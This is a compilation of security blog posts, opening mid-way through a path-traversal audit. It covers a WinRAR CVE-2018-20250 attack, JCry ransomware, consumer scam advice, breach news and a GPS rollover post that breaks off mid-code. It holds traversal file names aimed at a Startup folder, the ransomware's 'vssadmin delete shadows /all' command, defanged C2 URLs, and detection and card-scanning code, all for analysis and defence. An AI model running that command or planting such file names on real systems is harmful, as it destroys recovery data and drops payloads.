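    "docs/../notes.txt",                # '..' that stays inside base_dir
    "../../escaped.exe",                # climbs out of base_dir
    "..\\..\\escaped.exe",              # same, with Windows separators
    "C:\\Windows\\Temp\\escaped.exe",   # drive letter: ignores base_dir entirely
    "../../Start Menu/Programs/Startup/payload.exe",  # traversal into a Startup folder
]

if __name__ == "__main__":
    for entry in audit_members("/tmp/extract", SAMPLE_MEMBERS):
        print(*entry)
```

Note that `docs/../notes.txt` is accepted: a `..` component is only a problem when the normalized path leaves the extraction directory, which is why the check is done on the resolved target rather than by searching the raw name for `..`.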

Figure 10. ACE file with CVE-2018-20250 exploit

The ACE file contains three JPEG files that may look related to the email and Word document lures. When the user attempts to extract any of them, the exploit triggers and drops the payload, dropbox.exe, to the Startup folder.

Figure 11. Contents of the malicious ACE file

Going back to the fake error message about a missing DLL that asks the user to restart the computer: the CVE-2018-20250 vulnerability only allows writing a file to a specified folder and has no capability to run the file immediately. Since the payload was dropped in the Startup folder, it is launched when the computer restarts.

The payload dropbox.exe performs the same actions as the malicious macro component, which helps ensure that the PowerShell backdoor is running. The PowerShell backdoor could allow a remote attacker to take full control of the compromised machine and make it a launchpad for more malicious actions. Exposing and stopping the attacks at the early stages is critical in preventing additional, typically more damaging impact of undetected malware implants.

Stopping attacks at the entry point with Office 365 ATP

The targeted attack we discussed in this blog and other attacks that use the CVE-2018-20250 exploit show how quickly attackers can take advantage of known vulnerabilities. Attackers are always in search of new vectors to reach more victims. In this attack, they also used some sophisticated code injection techniques. Protections against cyberattacks should be advanced, real-time, and comprehensive.

The URL detonation capabilities in Office 365 ATP were instrumental in detecting and blocking the malicious behaviors across the multiple stages of this sophisticated attack, protecting customers from potentially damaging outcomes. URL detonation, coupled with heuristics, behavior-based detections, and machine learning, allows Office 365 ATP to protect customers not only from targeted attacks, but also from well-crafted spear phishing attacks—in real time.

Unified protection across multiple attack vectors with Microsoft Threat Protection

These advanced defenses from Office 365 ATP are shared with other services in Microsoft Threat Protection, which provides seamless, integrated, and comprehensive protection against multiple attack vectors. Through signal-sharing, Microsoft Threat Protection orchestrates threat remediation.

For endpoints that are not protected by Office 365 ATP, Microsoft Defender ATP detects the attacker techniques used in this targeted attack. Microsoft Defender ATP is a unified endpoint protection platform for attack surface reduction, next generation protection, endpoint detection & response (EDR), auto investigation & remediation, as well as recently announced managed threat hunting and threat & vulnerability management.

Microsoft Defender ATP uses machine learning, behavior monitoring, and heuristics to detect sophisticated threats. Its industry-leading optics, integration with Office 365 ATP and other Microsoft Threat Protection services, and use of AMSI give it unique capabilities to detect attacker techniques, including the exploit, obfuscation, detection evasion, and fileless techniques observed in this attack.

The attacks that immediately exploited the WinRAR vulnerability demonstrate the importance of threat & vulnerability management in reducing organizational risk. Even if your organization was not affected by this attack against specific organizations in the satellite and communications industry, there are other malware campaigns that used the exploits.

Microsoft Defender ATP’s threat & vulnerability management capability uses a risk-based approach to the discovery, prioritization, and remediation of endpoint vulnerabilities. As a component of a unified endpoint protection platform, threat & vulnerability management in Microsoft Defender ATP provides these unique benefits:

  • Real-time correlation of EDR insights with info on endpoint vulnerabilities
  • Invaluable endpoint vulnerability context for incident investigations
  • Built-in remediation processes through Microsoft Intune and Microsoft System Center Configuration Manager

Figure 12. Sample Threat & Vulnerability Management dashboard showing WinRAR vulnerabilities on managed endpoints

The complex attack chain that incorporated sophisticated techniques observed in this targeted attack highlights the benefits of a comprehensive protection enriched by telemetry collected across the entire attack chain. Microsoft Threat Protection continues to evolve to provide integrated threat protection solution for the modern workplace.

Rex Plantado
Office 365 ATP Research Team

Indicators of compromise

Files (SHA-256):

  • 68133eb271d442216e66a8267728ab38bf143627aa5026a4a6d07bb616b3d9fd (Original email attachment) – detected as Trojan:O97M/Maudon.A
  • ef3617a68208f047ccae2d169b8208aa87df9a4b8959e529577fe11c2e0d08c3 (Document hosted in OneDrive link) – detected as Trojan:O97M/Maudon.A
  • 4cb0b2d9a4275d7e7f532f52c1b6ba2bd228a7b50735b0a644d2ecae96263352 (ACE file with CVE-2018-20250 exploit) – detected as Exploit:Win32/CVE-2018-20250
  • 6f78748f5b2902c05e88c1d2e45de8e7c635512a5f25d25217766554534277fe (dropbox.exe (Win64 Payload)) – detected as Trojan:Win32/Maudon.A
  • c0c22e689e1e9fa11cbf8718405b20ce57c1d7c85d8e6e45c617e2b095b01b15 (Encoded id.png) – detected as Trojan:PowerShell/Maudon.A
  • 0089736ee162095ac2e4e66de6468dbb7824fe73996bbea48a3bb85f7fdd53e4 (temp.vbs) – detected as ThreatRelated
  • 1c25286b8dea0ebe4e8fca0181c474ff47cf822330ef3613a7d599c12b37ff5f (PowerShell script decrypted from id.png) – detected as Trojan:PowerShell/Maudon.A
  • 144b3aa998cf9f30d6698bebe68a1248ca36dc5be534b1dedee471ada7302971 (Decrypted PowerShell) – detected as Trojan:PowerShell/Maudon.A

URLs:

  • hxxps://1drv[.]ms/u/s!AgvJCoYH9skpgUNf3Y3bfhSyFQao
  • hxxp://162[.]223[.]89[.]53/oa/
  • hxxp://162[.]223[.]89[.]53/oc/api/?t=<BOTID>
  • hxxp://162[.]223[.]89[.]53/or/?t=<BOTID>

The post Analysis of a targeted attack exploiting the WinRAR CVE-2018-20250 vulnerability appeared first on Microsoft Security.

What’s in Your IoT Cybersecurity Kit?

Did you know the average internet-enabled household contains more than ten connected devices? With IoT devices proliferating almost every aspect of our everyday lives, it’s no wonder IoT-based attacks are becoming smarter and more widespread than ever before. From DDoS to home network exposures, it appears cybercriminals have set their sights on the digital dependence inside the smart home — and users must be prepared.

A smart home in today’s world is no longer a wave of the future, but rather just a sign of the times we live in. You would be hard pressed to find a home that didn’t contain some form of smart device. From digital assistants to smart plugs, with more endpoints come more avenues bad actors can use to access home networks. As recently as 2018, users saw virtual assistants, smart TVs, and even smart plugs that appear secure but under the surface have security flaws that could facilitate home network exposures by bad actors in the future. Some IoT devices, like an IoT thermometer and home Wi-Fi routers, were actually used to conduct botnet attacks.

While federal agencies, like the FBI, and IoT device manufacturers are stepping up to do their part to combat IoT-based cyberattacks, there are still precautions users should take to ensure their smart home and family remain secure. Consider this your IoT cybersecurity kit to keep unwelcome visitors out of your home network.

  • When purchasing an IoT device, make security priority #1. Before your next purchase, conduct due diligence. Prioritize devices that have been on the market for an extended period of time, have a trusted name brand, and/or have a lot of online reviews. By following this vetting protocol, the chances are that the device’s security standards will be higher.
  • Keep your software up-to-date on all devices. To protect against potential vulnerabilities, manufacturers release software updates often. Set your device to auto-update, if possible, so you always have the latest software. This includes the apps you use to control the device.
  • Change factory settings immediately. Once you bring a new device into your home, change the default password to something difficult to guess. Cybercriminals often can find the default settings online and can use them to access your devices. If the device has advanced capabilities, use them.
  • Secure your home network. It’s important to think about security as integrated, not disconnected. Not all IoT devices stay in the home. Many are mobile but reconnect to home networks once they are back in the vicinity of the router. Protect your network of connected devices no matter where they go. Consider investing in an advanced internet router that has built-in protection that can secure and monitor any device that connects to your home network.
  • Use comprehensive security software. Vulnerabilities and threats emerge and evolve every day. Protect your network of connected devices no matter where you are with a tool like McAfee Total Protection.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post What’s in Your IoT Cybersecurity Kit? appeared first on McAfee Blogs.

JCry – A Ransomware written in Golang!

Estimated reading time: 4 minutes

For several months, QH Labs has been observing an upswing in ransomware activity. We found a new ransomware which is written in Go (Golang). Malware authors are finding it easy to write ransomware in Go rather than in traditional programming languages.

Infection by the JCry ransomware starts with a compromised website.

As shown in the above image, the malware author tries to deceive users by posing as an Adobe Flash Player update and downloading the malware onto the user’s machine. Fig 1 contains part of the JavaScript hosted on the compromised domain, which downloads a malicious file from the given URL. Whenever a deceived user clicks the Update button and executes the malicious file, intending to update Flash Player, the malware starts its execution.

Fig 1 : Part of malicious script.

Flow of Execution:

Technical Analysis:

The downloaded malware (flashplayer_install.exe) is a self-extracting archive. On execution, it extracts the components listed below into the “Startup” directory to establish persistence.

Components:

  1. msg.vbs
  2. Enc.exe
  3. Dec.exe

Fig 2 : Extracted components and SFX instructions.

As shown in the above figure, the malware extracts the components and starts msg.vbs along with Enc.exe (the encryptor).

msg.vbs:

This file is used to deceive the user into believing that the system tried to update Adobe Flash Player but access was denied.

Fig 3 : Message shown by msg.vbs

Enc.exe (Encryptor):

This executable is responsible for file encryption, and it is written in the Go language.

Fig 4 : Go Build ID and library strings of Go Lang found in file.

On execution, it first checks for the existence of a “personalKey.txt” file in the current directory to determine whether the system is already infected. If the file exists, the malware considers the system already infected and terminates itself; it also deletes msg.vbs and Enc.exe with the help of the decryptor file. For encryption, it uses a combination of the AES and RSA algorithms. File encryption is performed using the AES 128-bit algorithm with a 16-byte initialization vector in CBC mode. A hardcoded RSA public key is found in the enc.exe file and is later used to encrypt the AES key.

Fig 5 : RSA PUBLIC KEY

Fig 6: Acquire Context for Crypto operations.

It encrypts files with the 138 extensions listed below.

“3dm, 3ds, 3g2, 3gp, 7z, ai, aif, apk, app, asf, asp, avi, b, bak, bin, bmp, c, cbr, cer, cfg, cfm, cgi, cpp, crx, cs, csr, css, csv, cue, dat, db, dbf, dcr, dds, deb, dem, der, dmg, dmp, doc, dtd, dwg, dxf, eps, fla, flv, fnt, fon, gam, ged, gif, gpx, gz, h, hqx, htm, ics, iff, iso, jar, jpg, js, jsp, key, kml, kmz, log, lua, m, m3u, m4a, m4v, max, mdb, mdf, mid, mim, mov, mp3, mp4, mpa, mpg, msg, msi, nes, obj, odt, otf, pct, pdb, pdf, php, pkg, pl, png, pps, ppt, ps, psd, py, rar, rm, rom, rpm, rss, rtf, sav, sdf, sh, sln, sql, srt, svg, swf, tar, tex, tga, thm, tif, tmp, ttf, txt, uue, vb, vcd, vcf, vob, wav, wma, wmv, wpd, wps, wsf, xlr, xls, xml, yuv, zip”

To speed up encryption, it encrypts only 1 MB of data for files larger than 1 MB. After successful file encryption, it appends the “.jcry” extension to the filename.

Fig 7:Encrypted files with jcry Extension.

After encrypting files, it deletes all shadow copies with the help of the following command:

    vssadmin delete shadows /all

It then launches Dec.exe using a PowerShell command.

Fig 8: Vssadmin and PowerShell execution.

Dec.exe:

On execution, Dec.exe first terminates and deletes Enc.exe. Dec.exe is a console application that asks for the decryption key (the RSA private key). After a valid key is entered, it can decrypt the encrypted files.

Fig 9 : Dec.exe.
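As an added example of how a defender could spot the JCry execution chain described above in endpoint telemetry (illustrative code written for this page, not Quick Heal's detection logic), the Python below runs a few rules over constructed process-creation events: execution out of the Startup folder, the three component names, the vssadmin shadow-copy deletion, and Dec.exe spawned by PowerShell. Paths, PIDs and the user name are invented; only the program names and the vssadmin command line come from the analysis.

```python
import ntpath

# Marker of the Startup folder (compared case-insensitively).
STARTUP_DIR = "start menu\\programs\\startup\\"
# Component names the analysis lists for the JCry self-extracting archive.
JCRY_COMPONENTS = {"msg.vbs", "enc.exe", "dec.exe"}

# Constructed process-creation events in the spirit of Sysmon event 1.
# Paths, PIDs and the user name are invented.
STARTUP = "C:\\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"
SFX = "C:\\Users\\victim\\Downloads\\flashplayer_install.exe"
SAMPLE_EVENTS = [
    {"pid": 1001, "image": SFX, "cmdline": "flashplayer_install.exe",
     "parent": "C:\\Windows\\explorer.exe"},
    {"pid": 1002, "image": "C:\\Windows\\System32\\wscript.exe",
     "cmdline": f'wscript.exe "{STARTUP}msg.vbs"', "parent": SFX},
    {"pid": 1003, "image": STARTUP + "Enc.exe", "cmdline": "Enc.exe", "parent": SFX},
    {"pid": 1004, "image": "C:\\Windows\\System32\\vssadmin.exe",
     "cmdline": "vssadmin delete shadows /all", "parent": STARTUP + "Enc.exe"},
    {"pid": 1005, "image": STARTUP + "Dec.exe", "cmdline": "Dec.exe",
     "parent": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"},
    {"pid": 1006, "image": "C:\\Program Files\\Backup\\backup.exe",
     "cmdline": "backup.exe --nightly", "parent": "C:\\Windows\\System32\\services.exe"},
]


def classify_event(event: dict) -> list:
    """Return the names of the rules an event trips (empty for a benign event)."""
    image = event["image"].lower()
    cmdline = event["cmdline"].lower()
    name = ntpath.basename(image)
    parent = ntpath.basename(event["parent"]).lower()
    hits = []
    # Deleting shadow copies removes the easiest recovery path; rare outside ransomware.
    if name == "vssadmin.exe" and "delete" in cmdline and "shadows" in cmdline:
        hits.append("shadow_copy_deletion")
    # Binaries or scripts running out of the Startup folder: JCry's persistence.
    if STARTUP_DIR in image or STARTUP_DIR in cmdline:
        hits.append("startup_folder_execution")
    # The three component names dropped by the self-extracting archive.
    if name in JCRY_COMPONENTS or any(c in cmdline for c in JCRY_COMPONENTS):
        hits.append("jcry_component_name")
    # The encryptor hands off to the decryptor through PowerShell.
    if name == "dec.exe" and parent == "powershell.exe":
        hits.append("decryptor_launched_by_powershell")
    return hits


def triage(events) -> tuple:
    """Map each PID to its rule hits and decide whether the chain looks like JCry.

    The combined verdict requires both shadow-copy deletion and Startup-folder
    execution, so a lone administrator running vssadmin does not trip it.
    """
    findings = {e["pid"]: classify_event(e) for e in events}
    rules_seen = {r for hits in findings.values() for r in hits}
    ransomware_like = {"shadow_copy_deletion", "startup_folder_execution"} <= rules_seen
    return findings, ransomware_like


if __name__ == "__main__":
    findings, verdict = triage(SAMPLE_EVENTS)
    for pid, hits in findings.items():
        print(pid, hits or "-")
    print("JCry-like chain:", verdict)
```

The self-extracting archive itself (PID 1001) trips no rule, which is the point of correlating: the first event that is unambiguous is the shadow-copy deletion, and by then the encryptor has already started, so the Startup-folder and component-name rules are what give early warning.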

It also drops a ransom note on the desktop. To recover encrypted files, it demands $500 as ransom and provides an onion link (hxxp://kpx5wgcda7ezqjty.onion) where the infected user will get the private key after payment.

Fig 10: Ransom Note.

IOCs:

flashplayer_install.exe: c86c75804435efc380d7fc436e344898
Enc.exe : 5B640BE895C03F0D7F4E8AB7A1D82947
Dec.exe : 6B4ED5D3FDFEFA2A14635C177EA2C30D
Recovery Link: hxxp://kpx5wgcda7ezqjty.onion
Wallet Id: 1FKWhzAeNhsZ2JQuWjWsEeryR6TqLkKFUt

Prevention tips:

  1. Regularly take a backup of your important data on external drives like an HDD or pen drive, or in cloud storage.
  2. Install an antivirus and keep it updated.
  3. Keep your Operating System and software up-to-date.
  4. Never click on links or download attachments from any unknown or unwanted sources.

Subject Matter Expert:

Nagesh lathakar, Pratik Pachpor | Quick Heal Security Labs

The post JCry – A Ransomware written in Golang! appeared first on Seqrite Blog.

The language of InfoSec

As the cybersecurity industry has evolved, one dynamic has remained consistent: our industry-“speak”. We use a language that is very unique, difficult for new folks to understand, and oftentimes just plain sensationalistic. While any industry has its own technical terms, our language can also be a barrier to recruitment for many. This should be of concern to all of us in cybersecurity as we look to become more inclusive, rather than exclusive.

Language often reflects and supports a culture. Culture is defined by language norms and values of its people. It is easy to become conditioned to the way we speak and use terminology. As we look to how we can encourage industry growth and maturity, we should strive to evolve the way we use our industry’s nomenclature to be more open and consider how we are defining and shaping our industry’s culture through language. The exciting thing is, the opportunity is right before us, because cybersecurity is constantly evolving.

There are many examples of words that are part of the InfoSec culture – words that do not easily translate to people without a deep industry background. My approach is to avoid hyper technical or sensationalistic terms, and to create a language baseline that is simple and inclusive. Then, I put it to the test: Is the cyber language we’re speaking something my family can understand? Are there other terms we could use to simplify unique technical terms? Can we all agree to search for new words and try them out?

Let’s consider terms like sandboxing, detonation chamber, whitelists, blacklists, and so forth. While each have specific purposes, we should ask ourselves: are there different ways of saying the same things or defining these terms? What would the synonym be for “blacklist” and would “filtering known bad sites” or “risk lists” suffice?

We must also examine and test whether ways that are more easily understood help to make the industry appear more open and accepting to a broader, more diverse audience or talent population. This is not a matter of appearing politically correct – it is a matter of being pragmatic and understanding we will not solve the talent shortage in cybersecurity if we do not make some fundamental changes to the industry. One of the simple changes we could make is to make our common industry vernacular less intimidating.

Testing the waters, I fielded this very topic about whether our industry terms are terrifying and/or confusing to those not in the industry. While many shared examples of cyber terms we should explore, there was agreement that most of our vernacular leans to weaponized or militaristic language.

As a technology professional with 30 years of experience working for companies that are not pure security focused, I have spent many hours creating glossaries and explaining InfoSec language to my colleagues. Quite often there are raised eyebrows and snickers at some of the things we consider common language – as well as questioning and commentary on how unique security people are. I have no issue with uniqueness or deep skills, but that does not mean everything the industry does needs to be unique. The days of security by obscurity are dead.

The cyber insiders club we have created for ourselves is not what makes us special. What makes us special is that we are required to adapt quickly, evolve, and grow. If we don’t, we will become extinct. Bad actors are continually changing and modernizing their tools and methods. They recognize the evolution of InfoSec as an opportunity of scale. By allowing more people to easily understand the fundamentals of security and take an active role in shaping its culture, we can and will build better defenses. Imagine how much easier your job would be if you didn’t spend the first 30 minutes of every InfoSec-related meeting developing a common understanding of language.

If we are to truly influence and shape our industry’s culture, I am asking everyone in the industry to examine how and what we communicate, how we can make cybersecurity easier to understand by the language we use. Thus we will become more open and inclusive. We can do so much if we embrace change and growth, and open our arms to those who have so much to contribute, but who may not “speak” our language.

The post The language of InfoSec appeared first on Microsoft Security.

Emilia Clarke Is the Most Dangerous Game of Thrones® Celebrity

The net is dark and full of terrors, especially for fans of HBO’s popular show Game of Thrones®. As followers of the series gear up for the premiere of the eighth and final season on April 14th, fans may have more than just White Walkers to worry about. According to McAfee’s study on the Most Dangerous Celebrities, it turns out that search results for Emilia Clarke are among those most likely to be infected with malware.

In fact, the actress who portrays Daenerys Targaryen in the TV drama came in at #17 of our 2018 Most Dangerous Celebrities study. Cybercriminals use the allure of celebrities – such as Clarke – to trick unsuspecting users into visiting malicious websites. These sites can be used to install malware on a victim’s device or steal their personal information or passwords. With the premiere of the new season right around the corner, it’s likely that cybercrooks will take advantage of the hype around the show to lure supporters into their trap.

Thankfully, there are plenty of ways fans can keep up with the show and characters without putting their online safety at risk. Follow these tips to pledge your allegiance to your cybersafety:

  • Refrain from using illegal streaming sites. When it comes to dangerous online behavior, using illegal streaming sites is the equivalent of spreading the Mad King’s wildfire to your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do your device a favor and stream the show from a reputable source.
  • Be careful what you click. Don’t bend the knee to hackers who tempt users to click on their malicious sites. Users looking for information on the new season should be careful and trust only reliable sources. The safest option is to wait for the official release instead of visiting a potentially malware-ridden third-party website.
  • Keep your device software updated. Install new system and application updates on your devices as soon as they’re available. These updates often include security fixes that can help protect your laptop or computer from an army of undead software bugs.
  • Protect your online realm with a cybersecurity solution. Send your regards to malicious actors with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats. It also includes McAfee WebAdvisor, which helps alert users of malicious websites.

We wish you good fortune in the browsing to come. To stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

McAfee and the McAfee logo are trademarks or registered trademarks of McAfee, LLC or its subsidiaries in the United States and other countries. Other names and brands may be claimed as the property of others. Copyright ©2019 McAfee, LLC

The post Emilia Clarke Is the Most Dangerous Game of Thrones® Celebrity appeared first on McAfee Blogs.

Steer clear of tax scams

In the month of February, we saw an average of 300,000 phishing attempts across Microsoft’s browsing platforms daily. Our security experts expect these attempted scams to become increasingly more prevalent through the April 15 Tax Day, especially in the two weeks leading up to it, when about 25 percent of people file their taxes. The phishing campaigns we’ve seen aren’t just in the U.S., though; we’ve also recently uncovered similar tactics in Canada, Brazil and India. It’s important for users across the globe to follow best practices and stay vigilant.

With less than a month until the filing deadline in the U.S., we are urging the public to take the following simple steps to avoid tax scams – especially during the last-minute rush to file taxes.

  • Watch for suspicious emails. Be suspicious of all links and attachments, especially when the email seems “off” or unexpected – like an unexpected email from your credit card company, or financial institution. Phish-y emails often include spelling and grammatical errors, or will ask you to send personal information. In these cases, you can apply additional scrutiny on the sender, the content, and any links and attachments. If you know the sender, for example, you can double-check with them before opening or downloading the file.
  • Carefully inspect URLs. Hover over links to verify that the URL goes to the website where it’s supposed to direct you. Is it pointing to the site you expected? URL shorteners provide a lot of convenience, but can make this inspection difficult. If you’re unsure, rather than clicking a link, use search engines like Bing to get to the tax-related website you’re looking for and log in from there.
We recently discovered a phishing campaign targeting Canadian taxpayers where scammers were pretending to help Canadian taxpayers get their refunds, but really aimed to steal banking credentials. We’ve also seen old phishing documents resurface – these claim to be from the Canada Revenue Agency (CRA), inform victims that they have a refund via e-transfer from the CRA, and ask them to divulge their bank details where the funds will be “deposited”. We’ve also seen similar campaigns in Brazil and India.
  • Be wary of any attachments. If you haven’t just made a purchase for tax software, don’t be tricked by getting an email with an invoice from a tax preparation company. Sending fake invoices for services is one of the top methods attackers use to trick people into opening a malicious attachment that could automatically execute malware on your computer. Malicious attachments could also contain links that download and execute malicious programs. We’ve seen PDFs that contain innocuous-looking links that lead to people accidentally downloading malicious software designed to steal credentials, like usernames and passwords.
  • Don’t rely on passwords alone. Scammers take advantage of weak or stolen passwords used across multiple websites, so don’t just rely on your password to keep you safe. When possible, always use multi-factor authentication like the Microsoft Authenticator app for managing your sign-ins for Microsoft accounts and others, and Windows Hello for easy and secure sign-in to your Windows 10 device. These solutions enable biometric authentications like your face or fingerprint to quickly and safely sign in across devices, apps and browsers without you having to remember passwords. Did you know that with a Microsoft Account, you can securely and automatically sign-in to other Microsoft cloud-based applications including Bing, MSN, Cortana, Outlook.com, Xbox Live (PC only), Microsoft Store and Office?
  • Keep software current. Run a modern operating system, like Windows 10 or Windows 10 in S mode, with the latest security and feature updates, in tandem with next-generation anti-malware protection, such as Windows Defender Antivirus.

Microsoft security solutions can proactively inspect links and attachments, as well as block phishing documents and other malicious downloads to help protect users, even if they accidentally click a phishing link or open a malicious attachment. We expect tax scams to be on the rise in the next several months as global tax deadlines approach so our experts will be on the lookout for new campaigns.

Here are a couple of examples of what we’ve seen just in the last few weeks: two documents named irs_scanned_551712.doc and Tax(IP.PIN).doc. You’ll notice that the security tools built into Microsoft Office caught these and displayed a warning at the top. Before enabling content like this, ensure that the sender is a trusted source, and watch for things like missing or misspelled words.

tax-related phishing document with malicious macro code

Be on the lookout for scams like we’ve described here. There will undoubtedly be more schemes that crop up. Stay vigilant! Learn how to report phishing scam websites through Microsoft Edge or Internet Explorer and suspicious email messages through Outlook.com, Outlook 2016, or Office 365.

Keep these tips and tricks handy, and share with your networks so we can increase awareness of and stop the spread of Tax Day scams! For more information about Microsoft Security, please visit microsoft.com/security.

The post Steer clear of tax scams appeared first on Microsoft Security.

Possible Toyota Breach Affects Up to 3.1 Million Customers

Multiple sales subsidiaries of Toyota Motor Corp. were breached in an apparent cyberattack that may have leaked the personal information of up to 3.1 million people in the Tokyo area.

Toyota announced the possible breach in late March, attributing it to “unauthorized access” to a network server containing customer information, but said it was unable to confirm whether any data had actually been taken.

The hacking attempt was followed the next day by similar cyberattacks on Toyota’s subsidiaries in Vietnam and Thailand, each of which issued statements about the possibility of breaches without any further details or confirmation regarding the data compromised.

These three attempts followed another announcement made by Toyota’s Australian subsidiary in February, where it disclosed an attempted hack but was similarly light on details.

Toyota has yet to issue further statements on these incidents, but has apologized and promised to implement stronger security measures on its networks and at its facilities.


The post Possible Toyota Breach Affects Up to 3.1 Million Customers appeared first on Adam Levin.

Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach

Most people don’t think about their credit card information being stolen and sold over the dark web while they’re enjoying a night out at an Italian restaurant. However, many people are experiencing this harsh reality. Earl Enterprises, the parent company of Buca di Beppo, Planet Hollywood, Earl of Sandwich, and Mixology 101 in LA, confirmed that the company was involved in a massive data breach, which exposed the credit card information of 2.15 million customers.

The original discovery was made by cybersecurity researcher Brian Krebs, who found the underground hacking forum where the credit card information had been posted for sale. He determined that the data first surfaced on Joker’s Stash, an underground shop that sells large batches of freshly-stolen credit and debit cards on a regular basis. In late February, Joker’s Stash moved a batch of 2.15 million stolen cards onto their system. This breach involved malware remotely installed on the company’s point-of-sale systems, which allowed cybercrooks to steal card details from customers between May 23, 2018, and March 18, 2019. This malicious software was able to capture payment card details including card numbers, expiration dates, and, in some cases, cardholder names. With this information, thieves are able to clone cards and use them as counterfeits to purchase expensive merchandise such as high-value electronics.
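The point-of-sale malware described above works by scanning process memory for data laid out in the magnetic-stripe track formats and keeping only digit runs that pass the Luhn check. The following scanner, an added example that is not part of the McAfee post or any of the malware it describes, applies the same matching defensively so an investigator can sweep a memory dump or log file for cleartext track data. The track layouts are the standard ones; the sample buffer is constructed and uses the well-known Visa and Mastercard test numbers, not real cards.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Added example (not from the McAfee post): the pattern matching a point-of-sale
# RAM scraper relies on, written as a defensive scanner for memory dumps or logs.
# Card numbers below are the public Visa/Mastercard test numbers, not real cards.

# Track 1 layout: %B<PAN>^<NAME>^<YYMM><service code><discretionary data>?
TRACK1 = re.compile(rb"%B(\d{13,19})\^([^^?]{2,26})\^(\d{2})(\d{2})(\d{3})[^?]*\?")
# Track 2 layout: ;<PAN>=<YYMM><service code><discretionary data>?
TRACK2 = re.compile(rb";(\d{13,19})=(\d{2})(\d{2})(\d{3})[^?]*\?")


def luhn_ok(pan: str) -> bool:
    """Luhn checksum, used to discard digit runs that merely look like card numbers."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:                      # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """Keep only the BIN and last four so findings can be reported without re-exposing the card."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


@dataclass
class CardHit:
    track: int
    pan_masked: str
    expiry: str            # MM/YY
    name: Optional[str]    # only track 1 carries the cardholder name
    offset: int            # byte offset of the record in the scanned buffer


def scan_buffer(buf: bytes) -> List[CardHit]:
    """Return Luhn-valid track 1 and track 2 records found anywhere in buf, ordered by offset."""
    hits: List[CardHit] = []
    for m in TRACK1.finditer(buf):
        pan = m.group(1).decode()
        if luhn_ok(pan):
            expiry = f"{m.group(4).decode()}/{m.group(3).decode()}"
            name = m.group(2).decode("ascii", "replace").strip()
            hits.append(CardHit(1, mask_pan(pan), expiry, name, m.start()))
    for m in TRACK2.finditer(buf):
        pan = m.group(1).decode()
        if luhn_ok(pan):
            expiry = f"{m.group(4).decode()}/{m.group(3).decode()}"
            hits.append(CardHit(2, mask_pan(pan), expiry, None, m.start()))
    return sorted(hits, key=lambda h: h.offset)


# Constructed sample: two valid records and one Luhn-invalid decoy embedded in junk bytes.
SAMPLE_DUMP = (
    b"\x00\x00POS-TERMINAL-07\x00"
    b"%B4111111111111111^DOE/JANE^2212101000000000000?"
    b"\x00\xff\xffjunk"
    b";5555555555554444=2212101123456789?"
    b"\x00;1234567890123456=2212101?\x00"
)

if __name__ == "__main__":
    for hit in scan_buffer(SAMPLE_DUMP):
        print(hit)
```

Run against a real dump, the masked output is what you would keep as evidence; the decoy record shows why the Luhn filter matters, since a regex alone matches any 16-digit run in the right framing.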

It appears that all 67 Buca di Beppo locations in the U.S., a handful of the 31 Earl of Sandwich locations, and the Planet Hollywood locations in Las Vegas, New York, and Orlando were impacted during this breach. Additionally, Tequila Taqueria in Las Vegas, Chicken Guy! in Disney Springs, and Mixology 101 in Los Angeles were also affected by this breach. Earl Enterprises states that online orders were not affected.

While large company data breaches such as this are difficult to avoid, there are a few steps users can take to better protect their personal data from malicious thieves. Check out the following tips:

  • Keep an eye on your bank account. One of the simplest ways to determine whether someone is fraudulently using your credit card information is to monitor your bank statements. If you see any charges that you did not make, report it to the authorities immediately.
  • Check to see if you’ve been affected. If you know you’ve made purchases at an Earl Enterprises establishment in the last ten months, use this tool to check if you could have been potentially affected.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identity Theft Protection will help you monitor your accounts and alert you to any suspicious activity.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach appeared first on McAfee Blogs.

The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams

Today, we are extremely reliant on our GPS devices. In fact, we’re so reliant on them that map features are built into almost every IoT device we use, as well as into our vehicles. However, the Department of Homeland Security has issued an alert to make users aware of a GPS receiver issue called the GPS Week Number Rollover that is expected to occur on or around April 6, 2019. While this bug is only expected to affect a small number of older GPS devices, users who are impacted could face troubling results.

You may be wondering what will cause this rollover issue. The GPS navigation message carries the week number in a ten-bit field, so receivers count from week zero and the value wraps back to zero after 1,024 weeks, about 19.6 years. Because the last rollover took place on August 21, 1999, the next one falls on April 6, 2019. A receiver whose firmware does not account for the wrap can reset its date by 1,024 weeks and potentially corrupt navigation data, throwing off its location estimates. That means your GPS device could misrepresent your location drastically: each nanosecond the clock is out translates into roughly a foot of location error.
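To make the arithmetic behind the rollover concrete, here is an added example (not from the McAfee post) that shows what the ten-bit field actually carries for a given date, what a receiver that takes that value at face value decodes, and the common fix: resolving the ambiguity against a reference date such as the firmware build date. Dates, the reference date and the function names are this example’s own choices.

```python
from datetime import date, timedelta

# Added example (not from the original post): how the 10-bit GPS week number
# wraps, and how a receiver can resolve the resulting ambiguity.
GPS_EPOCH = date(1980, 1, 6)      # start of GPS week 0 (a Sunday)
WEEK_BITS = 10                    # width of the week field in the legacy navigation message
WEEK_MODULUS = 1 << WEEK_BITS     # 1024 weeks, roughly 19.6 years


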